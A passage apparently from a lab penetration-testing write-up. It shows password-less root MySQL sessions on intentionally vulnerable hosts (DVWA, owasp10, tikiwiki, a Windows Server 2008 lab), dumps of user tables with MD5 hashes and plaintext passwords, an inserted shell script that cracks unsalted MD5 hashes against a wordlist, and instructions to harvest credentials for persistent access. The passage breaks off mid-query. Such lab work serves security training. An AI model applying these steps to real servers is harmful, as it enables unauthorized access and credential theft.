Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| dvwa               |
| metasploit         |
| mysql              |
| owasp10            |
| tikiwiki           |
| tikiwiki195        |
+--------------------+
7 rows in set (0.002 sec)

MySQL [(none)]> use information_schema;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [information_schema]> show tables;
+---------------------------------------+
| Tables_in_information_schema          |
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| KEY_COLUMN_USAGE                      |
| PROFILING                             |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+
17 rows in set (0.001 sec)

MySQL [information_schema]> use dvwa;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [dvwa]> show tables;
+----------------+
| Tables_in_dvwa |
+----------------+
| guestbook      |
| users          |
+----------------+
2 rows in set (0.001 sec)

MySQL [dvwa]> select * from users;
+---------+------------+-----------+---------+----------------------------------+-------------------------------------------------------+
| user_id | first_name | last_name | user    | password                         | avatar                                                |
+---------+------------+-----------+---------+----------------------------------+-------------------------------------------------------+
|       1 | admin      | admin     | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 | http://172.16.123.129/dvwa/hackable/users/admin.jpg   |
|       2 | Gordon     | Brown     | gordonb | e99a18c428cb38d5f260853678922e03 | http://172.16.123.129/dvwa/hackable/users/gordonb.jpg |
|       3 | Hack       | Me        | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b | http://172.16.123.129/dvwa/hackable/users/1337.jpg    |
|       4 | Pablo      | Picasso   | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 | http://172.16.123.129/dvwa/hackable/users/pablo.jpg   |
|       5 | Bob        | Smith     | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 | http://172.16.123.129/dvwa/hackable/users/smithy.jpg  |
+---------+------------+-----------+---------+----------------------------------+-------------------------------------------------------+
5 rows in set (0.011 sec)
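The password column of dvwa.users holds unsalted MD5 hashes, so two things follow: identical hashes mean identical passwords (admin and smithy share 5f4dcc3b5aa765d61d8327deb882cf99), and each hash can be tested against a wordlist with nothing more than md5sum. The script below, added here as an example and not part of the original write-up, does both: it hashes a wordlist once, joins it against "user:hash" lines pulled from the dump, and separately reports hashes reused by more than one account. The dump file and the six-word list it writes are constructed for the offline run; for real work the same idea is hashcat mode 0 or john with --format=raw-md5 over a proper wordlist.

```sh
#!/bin/sh
# Added example, not from the original write-up: run the dumped dvwa.users
# hashes against a wordlist. DVWA stores unsalted MD5, so a hash can be
# checked with md5sum alone, and equal hashes mean equal passwords.
#
# Input format for crack_md5 and shared_hashes: "user:hash" lines.

md5_of() {
    # Hex MD5 of $1 without a trailing newline (what the web app stored).
    if command -v md5sum >/dev/null 2>&1; then
        printf '%s' "$1" | md5sum | cut -d' ' -f1
    else
        printf '%s' "$1" | openssl dgst -md5 | awk '{ print $NF }'
    fi
}

# crack_md5 DUMPFILE WORDLIST -> "user:password" for every hash that matches.
crack_md5() {
    dump=$1
    wordlist=$2
    table=$(mktemp)
    # Hash the wordlist once, then join on the hash column.
    while IFS= read -r word; do
        [ -n "$word" ] || continue
        printf '%s\t%s\n' "$(md5_of "$word")" "$word"
    done < "$wordlist" > "$table"
    awk -v table="$table" '
        BEGIN {
            while ((getline line < table) > 0) {
                i = index(line, "\t")
                cracked[substr(line, 1, i - 1)] = substr(line, i + 1)
            }
            FS = ":"
        }
        (tolower($2) in cracked) { print $1 ":" cracked[tolower($2)] }
    ' "$dump"
    rm -f "$table"
}

# shared_hashes DUMPFILE -> "hash:user1,user2" for hashes used by more than
# one account; visible without cracking anything because there is no salt.
shared_hashes() {
    awk -F: '
        { n[$2]++; who[$2] = (who[$2] == "" ? $1 : who[$2] "," $1) }
        END { for (h in n) if (n[h] > 1) print h ":" who[h] }
    ' "$1" | LC_ALL=C sort
}

# Constructed input: the five dvwa.users rows from the dump above and a tiny
# made-up wordlist; in practice the wordlist would be rockyou.txt or similar.
write_samples() {
    cat > "$1" <<'EOF'
admin:5f4dcc3b5aa765d61d8327deb882cf99
gordonb:e99a18c428cb38d5f260853678922e03
1337:8d3533d75ae2c3966d7e0d4fcc69216b
pablo:0d107d09f5bbe40cade3de5c71e9e9b7
smithy:5f4dcc3b5aa765d61d8327deb882cf99
EOF
    cat > "$2" <<'EOF'
123456
password
qwerty
abc123
letmein
charley
EOF
}

# Demo run against the constructed files:  ./crack_dvwa.sh --demo
if [ "${1:-}" = "--demo" ]; then
    write_samples /tmp/dvwa_users.txt /tmp/words.txt
    crack_md5 /tmp/dvwa_users.txt /tmp/words.txt
    shared_hashes /tmp/dvwa_users.txt
fi
```

The owasp10.accounts table further down needs none of this, since it stores its passwords in plaintext.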

MySQL [dvwa]> select * from guestbook;
+------------+-------------------------+------+
| comment_id | comment                 | name |
+------------+-------------------------+------+
|          1 | This is a test comment. | test |
+------------+-------------------------+------+
1 row in set (0.002 sec)

MySQL [dvwa]> use metasploit;
Database changed
MySQL [metasploit]> show tables;
Empty set (0.001 sec)

MySQL [metasploit]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [mysql]> show tables;
+---------------------------+
| Tables_in_mysql           |
+---------------------------+
| columns_priv              |
| db                        |
| func                      |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| host                      |
| proc                      |
| procs_priv                |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
| user                      |
+---------------------------+
17 rows in set (0.002 sec)

MySQL [mysql]> select * from user;
+------+------------------+----------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+
| Host | User             | Password | Select_priv | Insert_priv | Update_priv | Delete_priv | Create_priv | Drop_priv | Reload_priv | Shutdown_priv | Process_priv | File_priv | Grant_priv | References_priv | Index_priv | Alter_priv | Show_db_priv | Super_priv | Create_tmp_table_priv | Lock_tables_priv | Execute_priv | Repl_slave_priv | Repl_client_priv | Create_view_priv | Show_view_priv | Create_routine_priv | Alter_routine_priv | Create_user_priv | ssl_type | ssl_cipher | x509_issuer | x509_subject | max_questions | max_updates | max_connections | max_user_connections |
+------+------------------+----------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+
|      | debian-sys-maint |          | Y           | Y           | Y           | Y           | Y           | Y         | Y           | Y             | Y            | Y         | Y          | Y               | Y          | Y          | Y            | Y          | Y                     | Y                | Y            | Y               | Y                | N                | N              | N                   | N                  | N                |          |            |             |              |             0 |           0 |               0 |                    0 |
| %    | root             |          | Y           | Y           | Y           | Y           | Y           | Y         | Y           | Y             | Y            | Y         | Y          | Y               | Y          | Y          | Y            | Y          | Y                     | Y                | Y            | Y               | Y                | Y                | Y              | Y                   | Y                  | Y                |          | Y          |             |              |             0 |           0 |               0 |                    0 |
| %    | guest            |          | Y           | Y           | Y           | Y           | Y           | Y         | Y           | Y             | Y            | Y         | Y          | Y               | Y          | Y          | Y            | Y          | Y                     | Y                | Y            | Y               | Y                | Y                | Y              | Y                   | Y                  | Y                |          | Y          |             |              |             0 |           0 |               0 |                    0 |
+------+------------------+----------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+
3 rows in set (0.002 sec)

MySQL [mysql]> use owasp10;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [owasp10]> show tables;
+-------------------+
| Tables_in_owasp10 |
+-------------------+
| accounts          |
| blogs_table       |
| captured_data     |
| credit_cards      |
| hitlog            |
| pen_test_tools    |
+-------------------+
6 rows in set (0.002 sec)

MySQL [owasp10]> select * from accounts;
+-----+----------+--------------+-----------------------------+----------+
| cid | username | password     | mysignature                 | is_admin |
+-----+----------+--------------+-----------------------------+----------+
|   1 | admin    | adminpass    | Monkey!                     | TRUE     |
|   2 | adrian   | somepassword | Zombie Films Rock!          | TRUE     |
|   3 | john     | monkey       | I like the smell of confunk | FALSE    |
|   4 | jeremy   | password     | d1373 1337 speak            | FALSE    |
|   5 | bryce    | password     | I Love SANS                 | FALSE    |
|   6 | samurai  | samurai      | Carving Fools               | FALSE    |
|   7 | jim      | password     | Jim Rome is Burning         | FALSE    |
|   8 | bobby    | password     | Hank is my dad              | FALSE    |
|   9 | simba    | password     | I am a cat                  | FALSE    |
|  10 | dreveil  | password     | Preparation H               | FALSE    |
|  11 | scotty   | password     | Scotty Do                   | FALSE    |
|  12 | cal      | password     | Go Wildcats                 | FALSE    |
|  13 | john     | password     | Do the Duggie!              | FALSE    |
|  14 | kevin    | 42           | Doug Adams rocks            | FALSE    |
|  15 | dave     | set          | Bet on S.E.T. FTW           | FALSE    |
|  16 | ed       | pentest      | Commandline KungFu anyone?  | FALSE    |
+-----+----------+--------------+-----------------------------+----------+
16 rows in set (0.024 sec)

MySQL [owasp10]> use tikiwiki;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [tikiwiki]> show tables;
+------------------------------------+
| Tables_in_tikiwiki                 |
+------------------------------------+
| galaxia_activities                 |
| galaxia_activity_roles             |
| galaxia_instance_activities        |
| galaxia_instance_comments          |
| galaxia_instances                  |
| galaxia_processes                  |
| galaxia_roles                      |
| galaxia_transitions                |
| galaxia_user_roles                 |
| galaxia_workitems                  |
| messu_archive                      |
| messu_messages                     |
| messu_sent                         |
| sessions                           |
| tiki_actionlog                     |
| tiki_article_types                 |
| tiki_articles                      |
| tiki_banners                       |
| tiki_banning                       |
| tiki_banning_sections              |
| tiki_blog_activity                 |
| tiki_blog_posts                    |
| tiki_blog_posts_images             |
| tiki_blogs                         |
| tiki_calendar_categories           |
| tiki_calendar_items                |
| tiki_calendar_locations            |
| tiki_calendar_roles                |
| tiki_calendars                     |
| tiki_categories                    |
| tiki_categorized_objects           |
| tiki_category_objects              |
| tiki_category_sites                |
| tiki_chart_items                   |
| tiki_charts                        |
| tiki_charts_rankings               |
| tiki_charts_votes                  |
| tiki_chat_channels                 |
| tiki_chat_messages                 |
| tiki_chat_users                    |
| tiki_comments                      |
| tiki_content                       |
| tiki_content_templates             |
| tiki_content_templates_sections    |
| tiki_cookies                       |
| tiki_copyrights                    |
| tiki_directory_categories          |
| tiki_directory_search              |
| tiki_directory_sites               |
| tiki_download                      |
| tiki_drawings                      |
| tiki_dsn                           |
| tiki_dynamic_variables             |
| tiki_eph                           |
| tiki_extwiki                       |
| tiki_faq_questions                 |
| tiki_faqs                          |
| tiki_featured_links                |
| tiki_file_galleries                |
| tiki_file_handlers                 |
| tiki_files                         |
| tiki_forum_attachments             |
| tiki_forum_reads                   |
| tiki_forums                        |
| tiki_forums_queue                  |
| tiki_forums_reported               |
| tiki_friends                       |
| tiki_friendship_requests           |
| tiki_galleries                     |
| tiki_galleries_scales              |
| tiki_games                         |
| tiki_group_inclusion               |
| tiki_history                       |
| tiki_hotwords                      |
| tiki_html_pages                    |
| tiki_html_pages_dynamic_zones      |
| tiki_images                        |
| tiki_images_data                   |
| tiki_integrator_reps               |
| tiki_integrator_rules              |
| tiki_language                      |
| tiki_languages                     |
| tiki_link_cache                    |
| tiki_links                         |
| tiki_live_support_events           |
| tiki_live_support_message_comments |
| tiki_live_support_messages         |
| tiki_live_support_modules          |
| tiki_live_support_operators        |
| tiki_live_support_requests         |
| tiki_logs                          |
| tiki_mail_events                   |
| tiki_mailin_accounts               |
| tiki_menu_languages                |
| tiki_menu_options                  |
| tiki_menus                         |
| tiki_minical_events                |
| tiki_minical_topics                |
| tiki_modules                       |
| tiki_newsletter_groups             |
| tiki_newsletter_subscriptions      |
| tiki_newsletters                   |
| tiki_newsreader_marks              |
| tiki_newsreader_servers            |
| tiki_object_ratings                |
| tiki_page_footnotes                |
| tiki_pages                         |
| tiki_pageviews                     |
| tiki_poll_objects                  |
| tiki_poll_options                  |
| tiki_polls                         |
| tiki_preferences                   |
| tiki_private_messages              |
| tiki_programmed_content            |
| tiki_quicktags                     |
| tiki_quiz_question_options         |
| tiki_quiz_questions                |
| tiki_quiz_results                  |
| tiki_quiz_stats                    |
| tiki_quiz_stats_sum                |
| tiki_quizzes                       |
| tiki_received_articles             |
| tiki_received_pages                |
| tiki_referer_stats                 |
| tiki_related_categories            |
| tiki_rss_feeds                     |
| tiki_rss_modules                   |
| tiki_score                         |
| tiki_search_stats                  |
| tiki_searchindex                   |
| tiki_searchsyllable                |
| tiki_searchwords                   |
| tiki_secdb                         |
| tiki_semaphores                    |
| tiki_sent_newsletters              |
| tiki_sessions                      |
| tiki_sheet_layout                  |
| tiki_sheet_values                  |
| tiki_sheets                        |
| tiki_shoutbox                      |
| tiki_shoutbox_words                |
| tiki_stats                         |
| tiki_structure_versions            |
| tiki_structures                    |
| tiki_submissions                   |
| tiki_suggested_faq_questions       |
| tiki_survey_question_options       |
| tiki_survey_questions              |
| tiki_surveys                       |
| tiki_tags                          |
| tiki_theme_control_categs          |
| tiki_theme_control_objects         |
| tiki_theme_control_sections        |
| tiki_topics                        |
| tiki_tracker_fields                |
| tiki_tracker_item_attachments      |
| tiki_tracker_item_comments         |
| tiki_tracker_item_fields           |
| tiki_tracker_items                 |
| tiki_tracker_options               |
| tiki_trackers                      |
| tiki_translated_objects            |
| tiki_untranslated                  |
| tiki_user_answers                  |
| tiki_user_answers_uploads          |
| tiki_user_assigned_modules         |
| tiki_user_bookmarks_folders        |
| tiki_user_bookmarks_urls           |
| tiki_user_mail_accounts            |
| tiki_user_menus                    |
| tiki_user_modules                  |
| tiki_user_notes                    |
| tiki_user_postings                 |
| tiki_user_preferences              |
| tiki_user_quizzes                  |
| tiki_user_taken_quizzes            |
| tiki_user_tasks                    |
| tiki_user_tasks_history            |
| tiki_user_votings                  |
| tiki_user_watches                  |
| tiki_userfiles                     |
| tiki_userpoints                    |
| tiki_users                         |
| tiki_users_score                   |
| tiki_webmail_contacts              |
| tiki_webmail_messages              |
| tiki_wiki_attachments              |
| tiki_zones                         |
| users_grouppermissions             |
| users_groups                       |
| users_objectpermissions            |
| users_permissions                  |
| users_usergroups                   |
| users_users                        |
+------------------------------------+
194 rows in set (0.003 sec)

MySQL [tikiwiki]> select * from tiki_users;
Empty set (0.001 sec)

MySQL [tikiwiki]> select * from users_users;
+--------+-------+-------+----------+----------+---------------+-----------+--------------+------------------+-----------+----------+----------------------------------+---------+------------+------------+----------------+------------+---------------+------------+-------+-------+
| userId | email | login | password | provpass | default_group | lastLogin | currentLogin | registrationDate | challenge | pass_due | hash                             | created | avatarName | avatarSize | avatarFileType | avatarData | avatarLibName | avatarType | score | valid |
+--------+-------+-------+----------+----------+---------------+-----------+--------------+------------------+-----------+----------+----------------------------------+---------+------------+------------+----------------+------------+---------------+------------+-------+-------+
|      1 |       | admin | admin    | NULL     | NULL          |      NULL |         NULL |             NULL | NULL      |     NULL | f6fdffe48c908deb0f4c3bd36c032e72 |    NULL | NULL       |       NULL | NULL           | NULL       | NULL          | NULL       |     0 | NULL  |
+--------+-------+-------+----------+----------+---------------+-----------+--------------+------------------+-----------+----------+----------------------------------+---------+------------+------------+----------------+------------+---------------+------------+-------+-------+
1 row in set (0.016 sec)

MySQL [tikiwiki]> use tikiwiki195;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [tikiwiki195]> show tables;
+------------------------------------+
| Tables_in_tikiwiki195              |
+------------------------------------+
| galaxia_activities                 |
| galaxia_activity_roles             |
| galaxia_instance_activities        |
| galaxia_instance_comments          |
| galaxia_instances                  |
| galaxia_processes                  |
| galaxia_roles                      |
| galaxia_transitions                |
| galaxia_user_roles                 |
| galaxia_workitems                  |
| messu_archive                      |
| messu_messages                     |
| messu_sent                         |
| sessions                           |
| tiki_actionlog                     |
| tiki_article_types                 |
| tiki_articles                      |
| tiki_banners                       |
| tiki_banning                       |
| tiki_banning_sections              |
| tiki_blog_activity                 |
| tiki_blog_posts                    |
| tiki_blog_posts_images             |
| tiki_blogs                         |
| tiki_calendar_categories           |
| tiki_calendar_items                |
| tiki_calendar_locations            |
| tiki_calendar_roles                |
| tiki_calendars                     |
| tiki_categories                    |
| tiki_categorized_objects           |
| tiki_category_objects              |
| tiki_category_sites                |
| tiki_chart_items                   |
| tiki_charts                        |
| tiki_charts_rankings               |
| tiki_charts_votes                  |
| tiki_chat_channels                 |
| tiki_chat_messages                 |
| tiki_chat_users                    |
| tiki_comments                      |
| tiki_content                       |
| tiki_content_templates             |
| tiki_content_templates_sections    |
| tiki_cookies                       |
| tiki_copyrights                    |
| tiki_directory_categories          |
| tiki_directory_search              |
| tiki_directory_sites               |
| tiki_download                      |
| tiki_drawings                      |
| tiki_dsn                           |
| tiki_dynamic_variables             |
| tiki_eph                           |
| tiki_extwiki                       |
| tiki_faq_questions                 |
| tiki_faqs                          |
| tiki_featured_links                |
| tiki_file_galleries                |
| tiki_file_handlers                 |
| tiki_files                         |
| tiki_forum_attachments             |
| tiki_forum_reads                   |
| tiki_forums                        |
| tiki_forums_queue                  |
| tiki_forums_reported               |
| tiki_friends                       |
| tiki_friendship_requests           |
| tiki_galleries                     |
| tiki_galleries_scales              |
| tiki_games                         |
| tiki_group_inclusion               |
| tiki_history                       |
| tiki_hotwords                      |
| tiki_html_pages                    |
| tiki_html_pages_dynamic_zones      |
| tiki_images                        |
| tiki_images_data                   |
| tiki_integrator_reps               |
| tiki_integrator_rules              |
| tiki_language                      |
| tiki_languages                     |
| tiki_link_cache                    |
| tiki_links                         |
| tiki_live_support_events           |
| tiki_live_support_message_comments |
| tiki_live_support_messages         |
| tiki_live_support_modules          |
| tiki_live_support_operators        |
| tiki_live_support_requests         |
| tiki_logs                          |
| tiki_mail_events                   |
| tiki_mailin_accounts               |
| tiki_menu_languages                |
| tiki_menu_options                  |
| tiki_menus                         |
| tiki_minical_events                |
| tiki_minical_topics                |
| tiki_modules                       |
| tiki_newsletter_groups             |
| tiki_newsletter_subscriptions      |
| tiki_newsletters                   |
| tiki_newsreader_marks              |
| tiki_newsreader_servers            |
| tiki_object_ratings                |
| tiki_page_footnotes                |
| tiki_pages                         |
| tiki_pageviews                     |
| tiki_poll_objects                  |
| tiki_poll_options                  |
| tiki_polls                         |
| tiki_preferences                   |
| tiki_private_messages              |
| tiki_programmed_content            |
| tiki_quicktags                     |
| tiki_quiz_question_options         |
| tiki_quiz_questions                |
| tiki_quiz_results                  |
| tiki_quiz_stats                    |
| tiki_quiz_stats_sum                |
| tiki_quizzes                       |
| tiki_received_articles             |
| tiki_received_pages                |
| tiki_referer_stats                 |
| tiki_related_categories            |
| tiki_rss_feeds                     |
| tiki_rss_modules                   |
| tiki_score                         |
| tiki_search_stats                  |
| tiki_searchindex                   |
| tiki_searchsyllable                |
| tiki_searchwords                   |
| tiki_secdb                         |
| tiki_semaphores                    |
| tiki_sent_newsletters              |
| tiki_sessions                      |
| tiki_sheet_layout                  |
| tiki_sheet_values                  |
| tiki_sheets                        |
| tiki_shoutbox                      |
| tiki_shoutbox_words                |
| tiki_stats                         |
| tiki_structure_versions            |
| tiki_structures                    |
| tiki_submissions                   |
| tiki_suggested_faq_questions       |
| tiki_survey_question_options       |
| tiki_survey_questions              |
| tiki_surveys                       |
| tiki_tags                          |
| tiki_theme_control_categs          |
| tiki_theme_control_objects         |
| tiki_theme_control_sections        |
| tiki_topics                        |
| tiki_tracker_fields                |
| tiki_tracker_item_attachments      |
| tiki_tracker_item_comments         |
| tiki_tracker_item_fields           |
| tiki_tracker_items                 |
| tiki_tracker_options               |
| tiki_trackers                      |
| tiki_translated_objects            |
| tiki_untranslated                  |
| tiki_user_answers                  |
| tiki_user_answers_uploads          |
| tiki_user_assigned_modules         |
| tiki_user_bookmarks_folders        |
| tiki_user_bookmarks_urls           |
| tiki_user_mail_accounts            |
| tiki_user_menus                    |
| tiki_user_modules                  |
| tiki_user_notes                    |
| tiki_user_postings                 |
| tiki_user_preferences              |
| tiki_user_quizzes                  |
| tiki_user_taken_quizzes            |
| tiki_user_tasks                    |
| tiki_user_tasks_history            |
| tiki_user_votings                  |
| tiki_user_watches                  |
| tiki_userfiles                     |
| tiki_userpoints                    |
| tiki_users                         |
| tiki_users_score                   |
| tiki_webmail_contacts              |
| tiki_webmail_messages              |
| tiki_wiki_attachments              |
| tiki_zones                         |
| users_grouppermissions             |
| users_groups                       |
| users_objectpermissions            |
| users_permissions                  |
| users_usergroups                   |
| users_users                        |
+------------------------------------+
194 rows in set (0.003 sec)

MySQL [tikiwiki195]> select * from users_users;
+--------+-------+-------+----------+----------+---------------+------------+--------------+------------------+-----------+----------+----------------------------------+---------+------------+------------+----------------+------------+---------------+------------+-------+
| userId | email | login | password | provpass | default_group | lastLogin  | currentLogin | registrationDate | challenge | pass_due | hash                             | created | avatarName | avatarSize | avatarFileType | avatarData | avatarLibName | avatarType | score |
+--------+-------+-------+----------+----------+---------------+------------+--------------+------------------+-----------+----------+----------------------------------+---------+------------+------------+----------------+------------+---------------+------------+-------+
|      1 |       | admin | admin    | NULL     | NULL          | 1271712540 |   1271712540 |             NULL | NULL      |     NULL | f6fdffe48c908deb0f4c3bd36c032e72 |    NULL | NULL       |       NULL | NULL           | NULL       | NULL          | NULL       |     0 |
+--------+-------+-------+----------+----------+---------------+------------+--------------+------------------+-----------+----------+----------------------------------+---------+------------+------------+----------------+------------+---------------+------------+-------+
1 row in set (0.023 sec)

MySQL [tikiwiki195]> exit
Bye
msf6 auxiliary(scanner/mysql/mysql_login) > exit

Windows Server 2008

As shown in the Gaining Access section, the MySQL service on the Windows Server 2008 machine lets the root account in without a password. Enter the service as root and list the databases hosted on the machine. To gather credentials for persistent access, go through every database and its tables, focusing on the tables that might hold user credential information.

msf6 auxiliary(scanner/mysql/mysql_login) > mysql -u root -h 192.168.56.105
[*] exec: mysql -u root -h 192.168.56.105

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 7
Server version: 5.5.20-log MySQL Community Server (GPL)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| cards              |
| mysql              |
| performance_schema |
| test               |
| wordpress          |
+--------------------+
6 rows in set (0.031 sec)

MySQL [(none)]> use information_schema;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [information_schema]> show tables;
+---------------------------------------+
| Tables_in_information_schema          |
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARAMETERS                            |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLESPACES                           |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
| INNODB_CMP_RESET                      |
| INNODB_TRX                            |
| INNODB_CMPMEM_RESET                   |
| INNODB_LOCK_WAITS                     |
| INNODB_CMPMEM                         |
| INNODB_CMP                            |
| INNODB_LOCKS                          |
+---------------------------------------+
37 rows in set (0.002 sec)

MySQL [information_schema]> show cards;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'cards' at line 1
MySQL [information_schema]> use cards;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [cards]> show tables;
+-----------------+
| Tables_in_cards |
+-----------------+
| queen_of_hearts |
+-----------------+
1 row in set (0.002 sec)

MySQL [cards]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [mysql]> show tables;
+---------------------------+
| Tables_in_mysql           |
+---------------------------+
| columns_priv              |
| db                        |
| event                     |
| func                      |
| general_log               |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| host                      |
| ndb_binlog_index          |
| plugin                    |
| proc                      |
| procs_priv                |
| proxies_priv              |
| servers                   |
| slow_log                  |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
| user                      |
+---------------------------+
24 rows in set (0.002 sec)

MySQL [mysql]> select * from user;
+-----------+------+----------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+--------+-----------------------+
| Host      | User | Password | Select_priv | Insert_priv | Update_priv | Delete_priv | Create_priv | Drop_priv | Reload_priv | Shutdown_priv | Process_priv | File_priv | Grant_priv | References_priv | Index_priv | Alter_priv | Show_db_priv | Super_priv | Create_tmp_table_priv | Lock_tables_priv | Execute_priv | Repl_slave_priv | Repl_client_priv | Create_view_priv | Show_view_priv | Create_routine_priv | Alter_routine_priv | Create_user_priv | Event_priv | Trigger_priv | Create_tablespace_priv | ssl_type | ssl_cipher | x509_issuer | x509_subject | max_questions | max_updates | max_connections | max_user_connections | plugin | authentication_string |
+-----------+------+----------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+--------+-----------------------+
| localhost | root |          | Y           | Y           | Y           | Y           | Y           | Y         | Y           | Y             | Y            | Y         | Y          | Y               | Y          | Y          | Y            | Y          | Y                     | Y                | Y            | Y               | Y                | Y                | Y              | Y                   | Y                  | Y                | Y          | Y            | Y                      |          |            |             |              |             0 |           0 |               0 |                    0 |        |                       |
| 127.0.0.1 | root |          | Y           | Y           | Y           | Y           | Y           | Y         | Y           | Y             | Y            | Y         | Y          | Y               | Y          | Y          | Y            | Y          | Y                     | Y                | Y            | Y               | Y                | Y                | Y              | Y                   | Y                  | Y                | Y          | Y            | Y                      |          |            |             |              |             0 |           0 |               0 |                    0 |        |                       |
| ::1       | root |          | Y           | Y           | Y           | Y           | Y           | Y         | Y           | Y             | Y            | Y         | Y          | Y               | Y          | Y          | Y            | Y          | Y                     | Y                | Y            | Y               | Y                | Y                | Y              | Y                   | Y                  | Y                | Y          | Y            | Y                      |          |            |             |              |             0 |           0 |               0 |                    0 |        |                       |
| localhost |      |          | N           | N           | N           | N           | N           | N         | N           | N             | N            | N         | N          | N               | N          | N          | N            | N          | N                     | N                | N            | N               | N                | N                | N              | N                   | N                  | N                | N          | N            | N                      |          |            |             |              |             0 |           0 |               0 |                    0 |        | NULL                  |
| %         | root |          | Y           | Y           | Y           | Y           | Y           | Y         | Y           | Y             | Y            | Y         | N          | Y               | Y          | Y          | Y            | Y          | Y                     | Y                | Y            | Y               | Y                | Y                | Y              | Y                   | Y                  | Y                | Y          | Y            | Y                      |          |            |             |              |             0 |           0 |               0 |                    0 |        | NULL                  |
+-----------+------+----------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+--------+-----------------------+
5 rows in set (0.009 sec)

MySQL [mysql]> use test;
Database changed
MySQL [test]> show tables;
Empty set (0.001 sec)

MySQL [test]> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [wordpress]> show tables;
+---------------------------+
| Tables_in_wordpress       |
+---------------------------+
| wp_commentmeta            |
| wp_comments               |
| wp_links                  |
| wp_nf_objectmeta          |
| wp_nf_objects             |
| wp_nf_relationships       |
| wp_ninja_forms_fav_fields |
| wp_ninja_forms_fields     |
| wp_options                |
| wp_postmeta               |
| wp_posts                  |
| wp_term_relationships     |
| wp_term_taxonomy          |
| wp_termmeta               |
| wp_terms                  |
| wp_usermeta               |
| wp_users                  |
+---------------------------+
17 rows in set (0.002 sec)

MySQL [wordpress]> select * from wp_users;
+----+------------+------------------------------------+---------------+---------------------+----------+---------------------+---------------------+-------------+--------------+
